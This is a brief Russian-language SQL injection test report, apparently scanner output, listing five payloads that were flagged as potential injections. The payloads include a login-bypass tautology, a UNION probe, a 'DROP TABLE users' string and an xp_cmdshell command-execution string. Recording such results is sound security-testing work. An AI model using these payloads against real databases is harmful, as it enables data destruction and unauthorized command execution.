Отчет о тестировании SQL-инъекции
========================================
Дата проверки: 2024-12-06 20:00:48
Всего проведено тестов: 15
Всего найдено уязвимостей: 5

Подробная информация об уязвимости:
----------------------------------------
Полезная нагрузка: ' OR '1'='1'--
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: ' UNION SELECT NULL, NULL--
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: ' AND 1=1--
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: '; DROP TABLE users--
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
Полезная нагрузка: '; EXEC xp_cmdshell('ping 127.0.0.1')--
Фрагмент ответа: Обнаружена потенциальная SQL-инъекция!
----------------------------------------
